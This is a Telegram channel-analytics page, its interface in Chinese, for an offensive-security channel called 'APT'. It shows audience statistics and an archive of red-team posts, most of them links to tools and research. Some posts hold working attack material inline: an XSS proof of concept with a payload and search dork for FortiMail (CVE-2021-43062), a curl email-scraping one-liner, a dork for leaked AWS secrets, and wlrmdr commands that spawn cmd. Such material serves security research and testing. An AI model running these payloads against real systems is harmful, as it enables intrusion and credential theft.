APT

前往频道在 Telegram

This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat

显示更多

俄罗斯45 631 技术与应用8 841...

📈 Telegram 频道 APT 的分析概览

频道 APT (@apt_notes) 英语语言赛道中的是活跃参与者。目前社区聚集了 14 674 名订阅者，在 技术与应用 类别中位列第 8 841，并在 俄罗斯 地区排名第 45 631 位。

📊 受众指标与增长动态

自 невідомо 创建以来，项目保持高速增长，吸引了 14 674 名订阅者。

根据 12 六月, 2026 的最新数据，频道保持稳定运转。过去 30 天订阅人数变化为 406，过去 24 小时变化为 7，整体触达仍然可观。

认证状态： 未认证
互动率 (ER)： 平均受众互动率为 49.89%。内容发布后 24 小时内通常能获得 N/A% 的反应，占订阅者总量。
帖子覆盖： 每篇帖子平均可获得 7 313 次浏览，首日通常累积 0 次浏览。
互动与反馈： 受众积极参与，单帖平均反应数为 20。

📝 描述与内容策略

作者将该频道定位为表达主观观点的平台：
“This channel discusses: — Offensive Security — RedTeam — Malware Research — OSINT — etc Disclaimer: t.me/APT_Notes/6 Chat Link: t.me/APT_Notes_PublicChat”

凭借高频更新（最新数据采集于 13 六月, 2026），频道始终保持新鲜度与高覆盖。分析显示受众积极互动，使其成为 技术与应用 类别中的关键影响点。

14 674

订阅者

+724 小时

+1007 天

+40630 天

7 313

帖子浏览量

无数据24 小时

无数据48 小时

49.89%

参与率

无数据

每日帖子数

Ads index

beta

帖子存档

14 674

Repost from PT SWARM

✅ A tip for obtaining NT hash from GenericWrite/All privileges. Works for both user and machine accounts.

14 674

OSINT Tip Quickly scrape email addresses from a site with this simple curl command

cat targets.txt | xargs -n1 -I{} curl -s https://{} | grep -E -o "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort -u

#osint #tip #curl #email #recon

14 674

Relaying Kerberos over DNS using krbrelayx and mitm6 New method of gaining RCE on AD hosts in the same VLAN without credentials or needing NTLM, by abusing Kerberos, DNS and Active Directory Certificate Services. https://dirkjanm.io/relaying-kerberos-over-dns-with-krbrelayx-and-mitm6/ #ad #kerberos #relay #mitm6

14 674

KnockOutlook KnockOutlook is a C# project that interacts with Outlook's COM object in order to perform a number of operations useful in red team engagements. https://github.com/eksperience/KnockOutlook #exchange #outlook #com #recon

14 674

Fortinet Fortimail 7.0.1 — Reflected Cross-Site Scripting (CVE-2021-43062) An improper neutralization of input during web page generation vulnerability in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service. PoC:

https://example/fmlurlsvc/?=&url=https%3A%2F%http://google.com%3CSvg%2Fonload%3Dalert(1)%3E

Payload: https%3A%2F%http://google.com%3CSvg%2Fonload%3Dalert(1)%3E Dork: inurl:/fmlurlsvc/ #fortinet #forimail #xss

14 674

Container Security Checklist Checklist for container security devsecops practices https://github.com/krol3/container-security-checklist #kubernetes #docker #security #cheatsheet #blueteam

14 674

PowerRunAsSystem Run application as system with interactive system process support (active Windows session). This technique doesn't rely on any external tools and doesn't require a Microsoft Service. It spawns an NT Authority/System process using the Microsoft Windows Task Scheduler then upgrade to Interactive System Process using cool WinApi's (Run in Active Windows Session) https://github.com/DarkCoderSc/PowerRunAsSystem #windows #powershell #runas

14 674

Bloodhound Custom Queries A combination of custom cypher queries from various sources for BloodHound, added categories to match newest version of BH. https://github.com/ZephrFish/Bloodhound-CustomQueries #ad #azure #bloodhound #queries

14 674

Google Groups Dork Some Devs use "Google Groups" as a workplace because it is easy and free. But a lot of sensitive information is leaked Such as "access keys", "aws secrets" ...etc . Dork:

site:http://groups.google.com "COMPANY"

#osint #dorks #bugbounty

14 674

Bypass 2FA Using noVNC Steal credentials and bypass 2FA by giving users remote access to your server via an HTML5 VNC client that has a browser running in kiosk mode. https://mrd0x.com/bypass-2fa-using-novnc/ #2fa #bypass #novnc

14 674

DNS Abuse & Misconfiguration The History of DNS Vulnerabilities and the Cloud https://unit42.paloaltonetworks.com/dns-vulnerabilities/ Dangling Domains: Security Threats, Detection and Prevalence https://unit42.paloaltonetworks.com/dangling-domains/ Fishing the AWS IP Pool for Dangling Domains https://bishopfox.com/blog/fishing-the-aws-ip-pool-for-dangling-domains Respect My Authority – Hijacking Broken Nameservers to Compromise Your Target https://thehackerblog.com/respect-my-authority-hijacking-broken-nameservers-to-compromise-your-target/ The Orphaned Internet – Taking Over 120K Domains via a DNS Vulnerability in AWS, Google Cloud, Rackspace and Digital Ocean https://thehackerblog.com/the-orphaned-internet-taking-over-120k-domains-via-a-dns-vulnerability-in-aws-google-cloud-rackspace-and-digital-ocean/ The .io Error – Taking Control of All .io Domains With a Targeted Registration https://thehackerblog.com/the-io-error-taking-control-of-all-io-domains-with-a-targeted-registration/ The International Incident – Gaining Control of a .int Domain Name With DNS Trickery https://thehackerblog.com/the-international-incident-gaining-control-of-a-int-domain-name-with-dns-trickery/ Hostile Subdomain Takeover using Heroku/Github/Desk + more https://labs.detectify.com/2014/10/21/hostile-subdomain-takeover-using-herokugithubdesk-more/ Dangling DNS: Amazon EC2 IPs https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state Eliminating Dangling Elastic IP Takeovers with Ghostbuster https://blog.assetnote.io/2022/02/13/dangling-eips/ Internet-Wide Analysis of Subdomain Takeovers https://redhuntlabs.com/blog/project-resonance-wave-1.html Subdomain Takeover https://0xpatrik.com/subdomain-takeover-basics/ https://0xpatrik.com/subdomain-takeover-candidates/ https://0xpatrik.com/takeover-proofs/ https://0xpatrik.com/subdomain-takeover-ns/ https://0xpatrik.com/subdomain-takeover/ #dns #abuse #aws #elastic #subdomain #takeover

14 674

Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more! Blog: https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6 Tool: https://github.com/ly4k/Certipy #ad #adcs #abuse #tools

14 674

LOLBIN — wlrmdr Action on click: wlrmdr.exe -s 60000 -f 1 -t "Important" -m "Click this dude!" -a 10 -u cmd You can use "-a 11" to skip the click requirement and spawn your process immediately: wlrmdr -s 0 -f 0 -t 0 -m 0 -a 11 -u cmd #windows #wlrmdr #lolbin #lolbas

14 674

DumpSMBShare A script to dump files and folders remotely from a Windows SMB share. https://github.com/p0dalirius/DumpSMBShare #ad #smb #share #dump

14 674

Keeping Up with the NTLM Relay https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay #ad #ntlm #relay #adcs

14 674

o365recon Script to retrieve information via O365 and AzureAD with a valid cred. https://github.com/nyxgeek/o365recon #azure #recon #tools

14 674

Zabbix SAML Authentication Bypass (CVE-2022-23131) https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage #zabbix #research #auth #bypass #cve

14 674

S3Scanner Scan for open S3 buckets and dump the contents Features: — Multi-threaded scanning — Supports tons of S3-compatible APIs — Scans all bucket permissions to find misconfigurations — Dump bucket contents to a local folder — Docker support https://github.com/sa7mon/S3Scanner #aws #s3 #bucket #scanner

14 674

Recon — Horizontal Enumeration https://aaryanapex.medium.com/bug-bounty-methodology-horizontal-enumeration-89f7cd172e6e #osint #recon #enumeration

14 674

Useful Libraries for Malware Development https://captmeelo.com/redteam/maldev/2022/02/16/libraries-for-maldev.html #edr #evasion #lib #maldev #cpp